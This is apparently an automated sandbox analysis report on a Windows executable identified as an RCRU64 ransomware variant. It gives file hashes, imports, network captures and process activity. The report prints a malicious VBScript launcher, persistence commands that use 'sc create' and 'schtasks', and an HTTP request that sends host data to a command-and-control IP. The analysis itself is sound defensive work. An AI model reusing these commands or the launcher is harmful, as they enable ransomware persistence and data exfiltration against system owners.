                                        Size (bytes):686
                                        Entropy (8bit):5.1743757294368
                                        Encrypted:false
                                        SSDEEP:12:MDhOfTK2Opx6/SYSHFagnXoWHgvvT9vTnMS8h92Mbx6/SYTlZ7D:s6f9/SY7UgDVnMS8j2Mbs/SYTlZH
                                        MD5:ED7A274FF8AC640416952BFB5D6C927A
                                        SHA1:6B33CD5B39DB6E9A900336E446F64A137F0A0F42
                                        SHA-256:4D68E4A7A437EB4A7AD9C7B28BDDA894A68AE41EFBA8A5E4D3A6A930BEBFEEA5
                                        SHA-512:8F3A4F071550AFE716C5D39601CF1E8559084FBB701E95B28EB7685FED6D8A972E662AD19124A2242FD30C291B8DD1F18F1A2DCF56AC6C98F2BF96BAC91510F3
                                        Malicious:true
                                        Preview:Dim strScript..Dim oExec, oWshShell..Dim ComSpec..Set oWshShell = CreateObject("WScript.Shell")..ComSpec = oWshShell.ExpandEnvironmentStrings("%comspec%")..strScript = ComSpec & " /C echo %SystemDrive%\Users\%username%\AppData\S-6748.bat"..Set oExec = oWshShell.Exec (strScript)..Dim outputsxc..outputsxc = oExec.StdOut.ReadAll()..Set fso = CreateObject("Scripting.FileSystemObject")..outputsxc = Replace(outputsxc, vbCr, "")..outputsxc = Replace(outputsxc, vbLf, "")..If (fso.FileExists(outputsxc)) Then..Set WinScriptHost = CreateObject("WScript.Shell")..WinScriptHost.Run Chr(34) & "%SystemDrive%\Users\%username%\AppData\S-6748.bat" & Chr(34), 0..Set WinScriptHost = Nothing..End If

                                        C:\Windows\SysMain.sys

                                        Download File
                                        Process:C:\Users\user\Desktop\xKvkNk9SXR.exe
                                        File Type:ASCII text, with very long lines (417), with no line terminators
                                        Category:dropped
                                        Size (bytes):417
                                        Entropy (8bit):5.8525165124852
                                        Encrypted:false
                                        SSDEEP:12:BwSx4B3dXYPR/+GBVMnnwGnzZkSLjptQU:B78dXgJfMnwCeY/QU
                                        MD5:A17C6F22EFD9EB6B574F136E1E75542C
                                        SHA1:7683FB934B32EE38D6FEE7537B60D0B059C89338
                                        SHA-256:310DCFA92A0F5B726EAA8CB182056B53C3BED1276670A8EE0D6343FF3FA49FC8
                                        SHA-512:4A80E1921040C5BA876233D5F357D168FF5756D8610AEC9F0AD4E90E8A588E24A194202BADD0524455124E6C4CC9A79405EE1272BEDFD9DE1D3C674B95EA4054
                                        Malicious:true
                                        Preview:n7t0MIIBIDANBgkqhkiG9w0BAQEFAAOCAQ0AMIIBCAKCAQEAqulXntwvCFZt2AesTGv2lgODHIsS+VbDDGxMsygP52f8weqcoqF928ZSm6K+FFbZoV02TfQh61KWSCyFgotz72QWkoV+dJB4p1a4TZIR5eGo5ZqnwX6NhYKUnQBQjubADaE/dN1zlqFxCt2uxmYCVD8YrU0hR24WBd0aLF/3vcupEpu2ZKzrXuuK6/dPFlQbFSeEYRpvFWgdYKBfjq/BFP/FIHmrTPcdwchgGG1guRBLVuugSkm1ccxhpXDO15C8BiW/meAZTumQ4vGhqQ7hEPASDqnH+pom7AsO+iDH8fQoUAWWiLP1SSKdYxEcA+1dA1f7H81Rj+3aFAzYgLFcCwIBEQ==p2h6INW15u4g8.PBFh2gq

                                        \Device\Null

                                        Download File
                                        Process:C:\Windows\SysWOW64\find.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):50
                                        Entropy (8bit):4.484372820753982
                                        Encrypted:false
                                        SSDEEP:3:SOXaAdiJSdupkSIv:SOdkpkRv
                                        MD5:78509DDB3CB5A0D31A20C36AC125F083
                                        SHA1:BEF06A265B2C07275F37B3BB1B9A0E6F891A2471
                                        SHA-256:0DB66FF0E90D17608BB004A1D9642C85BD2FDBA64FEBD0E4DDA1A216BF9ACC8A
                                        SHA-512:FF5F3361F9D49A60CBDFBBBDEA3344285B783183C630A2F82772EFF68138F3CD80C15584C006B1142C0EE0BB589473684BB37133A874382D822510B722DA949F
                                        Malicious:false
                                        Preview:"xKvkNk9SXR.exe","7032","Console","1","15'624 K"..

                                        Static File Info

                                        General

                                        File type:PE32 executable (console) Intel 80386, for MS Windows
                                        Entropy (8bit):6.58800049787178
                                        TrID:
                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                        • DOS Executable Generic (2002/1) 0.02%
                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                        File name:xKvkNk9SXR.exe
                                        File size:1'257'984 bytes
                                        MD5:603b398c14ffc8c0b647c58e9886c557
                                        SHA1:58b80929a19cfb40c683cc10f5c8167e5543c553
                                        SHA256:2619065d71a290ad0369cb3c19f1d5a58c43bf7abb52fb8828727483d32bdcf7
                                        SHA512:a761820df0cc415e2ed6637359788b3c6ce020f6097db3dda1fb3fae64cba38a72d9be9359a273de11f26b67264853de22a7f7d9b82e56a776d9eef58d379a32
                                        SSDEEP:24576:5ZqLyIjsi3CKrjp51iKT1gI0WSRuTxy087a2bJtMlLE7hUEPBUTIG+u4:aLfnCKrj8C1wRuTxaamM27hU4BUTIG+t
                                        TLSH:DD45BE307542C132D56181F05E7CEBAA90ACBD384F758ACBB3D46B2E4A315D25E36E63
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Jid.+.7.+.7.+.7,..7.+.7,..7++.7,..7.+.7,A.6.+.7,A.6.+.7,A.6.+.7.S.7.+.7.+.7A+.7.@.6.+.7.@.6.+.7.@.7.+.7.@.6.+.7Rich.+.7.......

                                        File Icon

                                        Icon Hash:00928e8e8686b000

                                        Static PE Info

                                        General

                                        Entrypoint:0x490f31
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows cui
                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x6515E0CF [Thu Sep 28 20:23:43 2023 UTC]
                                        TLS Callbacks:0x490570
                                        CLR (.Net) Version:
                                        OS Version Major:5
                                        OS Version Minor:1
                                        File Version Major:5
                                        File Version Minor:1
                                        Subsystem Version Major:5
                                        Subsystem Version Minor:1
                                        Import Hash:f527e8080fac9432953c548a4f7317af

                                        Entrypoint Preview

                                        Instruction
                                        call 00007FAA7CAB6E07h
                                        jmp 00007FAA7CAB5F89h
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        cmp cl, 00000040h
                                        jnc 00007FAA7CAB6127h
                                        cmp cl, 00000020h
                                        jnc 00007FAA7CAB6118h
                                        shrd eax, edx, cl
                                        shr edx, cl
                                        ret
                                        mov eax, edx
                                        xor edx, edx
                                        and cl, 0000001Fh
                                        shr eax, cl
                                        ret
                                        xor eax, eax
                                        xor edx, edx
                                        ret
                                        int3
                                        push esi
                                        mov eax, dword ptr [esp+14h]
                                        or eax, eax
                                        jne 00007FAA7CAB613Ah
                                        mov ecx, dword ptr [esp+10h]
                                        mov eax, dword ptr [esp+0Ch]
                                        xor edx, edx
                                        div ecx
                                        mov ebx, eax
                                        mov eax, dword ptr [esp+08h]
                                        div ecx
                                        mov esi, eax
                                        mov eax, ebx
                                        mul dword ptr [esp+10h]
                                        mov ecx, eax
                                        mov eax, esi
                                        mul dword ptr [esp+10h]
                                        add edx, ecx
                                        jmp 00007FAA7CAB6159h
                                        mov ecx, eax
                                        mov ebx, dword ptr [esp+10h]
                                        mov edx, dword ptr [esp+0Ch]
                                        mov eax, dword ptr [esp+08h]
                                        shr ecx, 1
                                        rcr ebx, 1
                                        shr edx, 1
                                        rcr eax, 1
                                        or ecx, ecx
                                        jne 00007FAA7CAB6106h
                                        div ebx
                                        mov esi, eax
                                        mul dword ptr [esp+14h]
                                        mov ecx, eax
                                        mov eax, dword ptr [esp+10h]
                                        mul esi
                                        add edx, ecx
                                        jc 00007FAA7CAB6120h
                                        cmp edx, dword ptr [esp+0Ch]
                                        jnbe 00007FAA7CAB611Ah
                                        jc 00007FAA7CAB6121h
                                        cmp eax, dword ptr [esp+08h]
                                        jbe 00007FAA7CAB611Bh
                                        dec esi
                                        sub eax, dword ptr [esp+10h]
                                        sbb edx, dword ptr [esp+14h]
                                        xor ebx, ebx
                                        sub eax, dword ptr [esp+08h]
                                        sbb edx, dword ptr [esp+0Ch]
                                        neg edx
                                        neg eax
                                        sbb edx, 00000000h
                                        mov ecx, edx
                                        mov edx, ebx
                                        mov ebx, ecx
                                        mov ecx, eax
                                        mov eax, esi
                                        pop esi
                                        retn 0010h
                                        int3
                                        int3
                                        int3

                                        Rich Headers

                                        Programming Language:
                                        • [IMP] VS2008 SP1 build 30729

                                        Data Directories

                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x11da440xb4.rdata
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x1300000x1e0.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x1310000xd71c.reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x1056200x70.rdata
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x1057340x18.rdata
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1056900x40.rdata
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0xe30000x328.rdata
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                        Sections

                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x10000xe12e60xe1400c0c638d3c7236d1276c4801b4e4af971False0.45993058927580466zlib compressed data6.644423107346062IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        .rdata0xe30000x3bc880x3be00204389296771c0cb4c3485188f1b8413False0.39400525182672236data5.008672243547162IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .data0x11f0000x107780x82009c5a7f4cd5cc334c6c554a46a0cc5c46False0.1565204326923077data4.83200775535347IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .rsrc0x1300000x1e00x200319e7ac1640c4d053129c81ac0038351False0.52734375data4.701503258251789IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .reloc0x1310000xd71c0xd800ecd90901d384aab5cedc091734e4b682False0.5701497395833334data6.574336043075699IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                        Resources

                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                        RT_MANIFEST0x1300600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

                                        Imports

                                        DLLImport
                                        KERNEL32.dllSleep, FormatMessageW, GetLastError, SetEvent, GetDiskFreeSpaceExW, GetCurrentThread, WaitForSingleObjectEx, CloseHandle, HeapAlloc, GetLogicalDriveStringsA, GetProcAddress, SetFilePointerEx, LocalFree, GetFileSize, GetProcessHeap, GlobalMemoryStatusEx, MultiByteToWideChar, CopyFileW, WideCharToMultiByte, GetConsoleWindow, FormatMessageA, CreateSemaphoreA, CreateEventA, lstrcmpW, SetConsoleTitleW, SetLastError, QueryPerformanceCounter, QueryPerformanceFrequency, GetThreadTimes, WriteConsoleW, SetStdHandle, SetEnvironmentVariableA, FreeEnvironmentStringsW, GetComputerNameExW, GetSystemDirectoryW, GetFileAttributesW, CreateFileW, LocalAlloc, FindClose, WaitForMultipleObjectsEx, SetFilePointer, SetErrorMode, GetModuleFileNameW, WriteFile, ReleaseSemaphore, GetCurrentProcess, FindNextFileW, HeapFree, FindFirstFileW, ReadFile, GetModuleHandleW, CreateDirectoryW, GetEnvironmentStringsW, GetOEMCP, IsValidCodePage, FindNextFileA, FindFirstFileExA, GetTimeZoneInformation, HeapSize, HeapReAlloc, ReadConsoleW, CreatePipe, GetExitCodeProcess, GetConsoleMode, GetConsoleCP, FlushFileBuffers, GetFileType, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetTimeFormatW, GetDateFormatW, GetACP, GetCommandLineW, GetStringTypeW, EnterCriticalSection, LeaveCriticalSection, TryEnterCriticalSection, DeleteCriticalSection, GetCurrentThreadId, InitializeCriticalSectionAndSpinCount, CreateEventW, SwitchToThread, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetSystemTimeAsFileTime, GetTickCount, EncodePointer, DecodePointer, CompareStringW, LCMapStringW, GetLocaleInfoW, GetCPInfo, DeleteFileW, GetFileAttributesExW, SetEndOfFile, DeviceIoControl, MoveFileExW, AreFileApisANSI, ResetEvent, OpenEventA, SetWaitableTimer, GetCurrentProcessId, ResumeThread, GetLogicalProcessorInformation, GetModuleHandleA, CreateWaitableTimerA, InitializeSListHead, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsDebuggerPresent, GetStartupInfoW, SignalObjectAndWait, CreateThread, SetThreadPriority, GetThreadPriority, CreateTimerQueueTimer, ChangeTimerQueueTimer, DeleteTimerQueueTimer, GetNumaHighestNodeNumber, GetProcessAffinityMask, SetThreadAffinityMask, RegisterWaitForSingleObject, UnregisterWait, FreeLibrary, FreeLibraryAndExitThread, LoadLibraryExW, GetVersionExW, VirtualAlloc, VirtualProtect, VirtualFree, DuplicateHandle, InterlockedPopEntrySList, InterlockedPushEntrySList, InterlockedFlushSList, QueryDepthSList, UnregisterWaitEx, CreateTimerQueue, LoadLibraryW, WaitForSingleObject, RtlUnwind, RaiseException, ExitProcess, GetModuleHandleExW, CreateProcessA, ExitThread, GetModuleFileNameA, GetStdHandle, GetCommandLineA
                                        USER32.dllEnumWindows, GetWindowTextA, ShowWindow, GetWindowTextLengthA
                                        ADVAPI32.dllCryptGenRandom, CryptReleaseContext, CryptAcquireContextA, SetSecurityDescriptorDacl, AccessCheck, SetSecurityDescriptorOwner, AllocateAndInitializeSid, IsValidSecurityDescriptor, OpenProcessToken, FreeSid, InitializeSecurityDescriptor, InitializeAcl, DuplicateToken, GetLengthSid, GetUserNameW, AddAccessAllowedAce, OpenThreadToken, SetSecurityDescriptorGroup
                                        SHELL32.dllShellExecuteW
                                        WS2_32.dllhtons, recv, connect, socket, send, WSAStartup, closesocket, WSACleanup, gethostbyname
                                        SHLWAPI.dllPathIsNetworkPathA
                                        NETAPI32.dllNetUserEnum, DsRoleGetPrimaryDomainInformation, NetApiBufferFree
                                        WININET.dllHttpOpenRequestW, HttpSendRequestW, InternetOpenW, InternetReadFile, InternetConnectW

                                        Possible Origin

                                        Language of compilation systemCountry where language is spokenMap
                                        EnglishUnited States

                                        Network Behavior

                                        Suricata IDS Alerts

                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                        2024-12-06T13:51:12.165027+01002045821ET MALWARE [ANY.RUN] RCRU64 Ransomware Variant CnC Activity1192.168.2.549705185.147.34.533586TCP

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Dec 6, 2024 13:51:22.142662048 CET4970480192.168.2.5104.26.12.205
                                        Dec 6, 2024 13:51:22.262693882 CET8049704104.26.12.205192.168.2.5
                                        Dec 6, 2024 13:51:22.262808084 CET4970480192.168.2.5104.26.12.205
                                        Dec 6, 2024 13:51:22.269814968 CET4970480192.168.2.5104.26.12.205
                                        Dec 6, 2024 13:51:22.389632940 CET8049704104.26.12.205192.168.2.5
                                        Dec 6, 2024 13:51:23.362533092 CET8049704104.26.12.205192.168.2.5
                                        Dec 6, 2024 13:51:23.362627983 CET4970480192.168.2.5104.26.12.205
                                        Dec 6, 2024 13:51:23.547281981 CET497053586192.168.2.5185.147.34.53
                                        Dec 6, 2024 13:51:23.667259932 CET358649705185.147.34.53192.168.2.5
                                        Dec 6, 2024 13:51:23.667334080 CET497053586192.168.2.5185.147.34.53
                                        Dec 6, 2024 13:51:24.649317026 CET497053586192.168.2.5185.147.34.53
                                        Dec 6, 2024 13:51:24.769205093 CET358649705185.147.34.53192.168.2.5
                                        Dec 6, 2024 13:51:24.769362926 CET497053586192.168.2.5185.147.34.53
                                        Dec 6, 2024 13:51:24.769475937 CET497053586192.168.2.5185.147.34.53
                                        Dec 6, 2024 13:51:24.889878988 CET358649705185.147.34.53192.168.2.5
                                        Dec 6, 2024 13:51:24.890341043 CET358649705185.147.34.53192.168.2.5

                                        UDP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Dec 6, 2024 13:51:21.966609955 CET5432153192.168.2.51.1.1.1
                                        Dec 6, 2024 13:51:22.103857040 CET53543211.1.1.1192.168.2.5

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Dec 6, 2024 13:51:21.966609955 CET192.168.2.51.1.1.10x16a2Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Dec 6, 2024 13:51:22.103857040 CET1.1.1.1192.168.2.50x16a2No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                        Dec 6, 2024 13:51:22.103857040 CET1.1.1.1192.168.2.50x16a2No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                        Dec 6, 2024 13:51:22.103857040 CET1.1.1.1192.168.2.50x16a2No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false

                                        HTTP Request Dependency Graph

                                        • api.ipify.org
                                        • 185.147.34.53

                                        HTTP Packets

                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.549704104.26.12.205807032C:\Users\user\Desktop\xKvkNk9SXR.exe
                                        TimestampBytes transferredDirectionData
                                        Dec 6, 2024 13:51:22.269814968 CET82OUTGET / HTTP/1.1
                                        Accept: text/*
                                        User-Agent: YourUserAgent
                                        Host: api.ipify.org
                                        Dec 6, 2024 13:51:23.362533092 CET429INHTTP/1.1 200 OK
                                        Date: Fri, 06 Dec 2024 12:51:23 GMT
                                        Content-Type: text/plain
                                        Content-Length: 12
                                        Connection: keep-alive
                                        Vary: Origin
                                        CF-Cache-Status: DYNAMIC
                                        Server: cloudflare
                                        CF-RAY: 8edc6835fa6a1891-EWR
                                        server-timing: cfL4;desc="?proto=TCP&rtt=1551&min_rtt=1551&rtt_var=775&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=82&delivery_rate=0&cwnd=170&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                        Data Raw: 38 2e 34 36 2e 31 32 33 2e 32 32 38
                                        Data Ascii: 8.46.123.228


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        1192.168.2.549705185.147.34.5335867032C:\Users\user\Desktop\xKvkNk9SXR.exe
                                        TimestampBytes transferredDirectionData
                                        Dec 6, 2024 13:51:24.769475937 CET2116OUTGET /110_And_Netword_Drive_Size:0_Encryption_Mode:_Fast_Mode!Empty]_____03/10/2023,_10:57:18$_06/12/2024-_7:51:[Version_10.0.19045.2006|Microsoft_Windows_10_Prohg3l,8.46.123.228~L8acq3ctygn4C5b6XsaUC8NQ4T5+jxiCsWkp7x/Hk8Cz2BBRGk0mufLQ+PUY1typcKrEwbK2Dj7BO9JOfDPuCfh3CsC3iPhAH2eScIc+GWLNXN+3hyXaq6j2YSWd5DmTTvK1Az6Y2HJdeT6zGl6i1w+ZGQLwGzy8RkS4oEtlW3UuJVLTmwGlR7YDbEAsKmRmfH7DPy5LzBAQywMQRipuvv+48axKwRXjo8jTBYqVPUjVsSEjhbXPLzM9Xl8KyCm8GT5vtwes3vLmsHwAGVQYt6Us2UTzSBdT9pgorDIbhDIj1Cwk35gD0LXznaGhiEJiInYLHVLDOXOWJKdNgqc46lWqA4wW0VuMf3EPOyqU5rpjqgp8qxSxJhTR/wcyQd2HbUZA16pPJXIZoJe2SIn/JT5eC9QAvRwM3UCi7ivb9fYZVrSlTF/thYWe80fZkyufyRCmdKQMuTBl9xsnavY9+hVq8Hy7mV1PPur7n4Wyf3wUh282zBNauAhJEyGreiPNkuZJ7x23lcM7XkLwGJb+Z4BlO6ZDi8aGpDuEQ8BIOqcf6mibsCw76IMfx9ChQBZaIs/VJIp1jERwD7V0DV/sfzVGP7doUDNiAsVwLAgERAoIBAANZ6J65BfEayvAoTqwqRhcFFqY07Esp26rpBoYFzh2iqppj+Qg1XNIc/Jmj0Yftn+AG2OhuMtx1EgFqSORxKm4bD4Bc+HC3ieUp23T40yyqEl7a4CbuZyrGUzpLTN+qK+wwVpPcL3Fiib71SbOTkZ1Cfflb3YPpD32a7G9NLQO4qsiKmwpC0NllcV8ej/lQSlji5ByZD6jQYAleNgPKm44Km75DSkIkh [TRUNCATED]
                                        Host: 185.147.34.53
                                        Connection: close


                                        Statistics

                                        CPU Usage

                                        Click to jump to process

                                        Memory Usage

                                        Click to jump to process

                                        High Level Behavior Distribution

                                        Click to dive into process behavior distribution

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        General

                                        Target ID:0
                                        Start time:07:51:14
                                        Start date:06/12/2024
                                        Path:C:\Users\user\Desktop\xKvkNk9SXR.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\xKvkNk9SXR.exe"
                                        Imagebase:0x9b0000
                                        File size:1'257'984 bytes
                                        MD5 hash:603B398C14FFC8C0B647C58E9886C557
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:false

                                        General

                                        Target ID:1
                                        Start time:07:51:14
                                        Start date:06/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:false

                                        General

                                        Target ID:2
                                        Start time:07:51:15
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\system32\cmd.exe /c tasklist /v /fo csv | findstr /i "dcdcf"
                                        Imagebase:0x790000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:3
                                        Start time:07:51:15
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\tasklist.exe
                                        Wow64 process (32bit):true
                                        Commandline:tasklist /v /fo csv
                                        Imagebase:0xee0000
                                        File size:79'360 bytes
                                        MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:4
                                        Start time:07:51:15
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\findstr.exe
                                        Wow64 process (32bit):true
                                        Commandline:findstr /i "dcdcf"
                                        Imagebase:0x8f0000
                                        File size:29'696 bytes
                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:6
                                        Start time:07:51:16
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto
                                        Imagebase:0x790000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:7
                                        Start time:07:51:17
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\sc.exe
                                        Wow64 process (32bit):true
                                        Commandline:sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto
                                        Imagebase:0xea0000
                                        File size:61'440 bytes
                                        MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        General

                                        Target ID:8
                                        Start time:07:51:17
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
                                        Imagebase:0x790000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:9
                                        Start time:07:51:17
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\sc.exe
                                        Wow64 process (32bit):true
                                        Commandline:sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
                                        Imagebase:0xea0000
                                        File size:61'440 bytes
                                        MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        General

                                        Target ID:10
                                        Start time:07:51:17
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Documents and Settings\user\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
                                        Imagebase:0x790000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:11
                                        Start time:07:51:17
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\sc.exe
                                        Wow64 process (32bit):true
                                        Commandline:sc create SqlBakup binPath= "C:\Documents and Settings\user\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
                                        Imagebase:0xea0000
                                        File size:61'440 bytes
                                        MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:12
                                        Start time:07:51:17
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\system32\cmd.exe /c ver
                                        Imagebase:0x790000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:13
                                        Start time:07:51:17
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&S-2153.bat
                                        Imagebase:0x790000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:14
                                        Start time:07:51:17
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\wscript.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs"
                                        Imagebase:0x2b0000
                                        File size:147'456 bytes
                                        MD5 hash:FF00E0480075B095948000BDC66E81F0
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:15
                                        Start time:07:51:17
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\system32\cmd.exe /c schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\S-2153.bat'" /f
                                        Imagebase:0x790000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
